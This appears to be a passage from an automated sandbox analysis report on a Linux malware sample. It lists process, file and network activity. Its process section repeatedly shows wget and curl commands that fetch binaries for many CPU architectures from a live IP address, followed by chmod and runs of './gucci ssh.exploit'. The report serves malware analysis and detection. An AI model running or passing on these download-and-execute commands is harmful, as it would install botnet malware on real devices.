| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/gucci | /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 | N/A |
Processes
/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118
[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm5]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm6]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm7]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/m68k]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mips]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mpsl]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/ppc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/sh4]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/spc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/x86]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
| US | 192.3.122.100:80 | | tcp |
Files
memory/715-1-0xb6794000-0xb67a5044-memory.dmp
memory/722-2-0xb6768000-0xb6779044-memory.dmp
memory/728-3-0xb675a000-0xb676b044-memory.dmp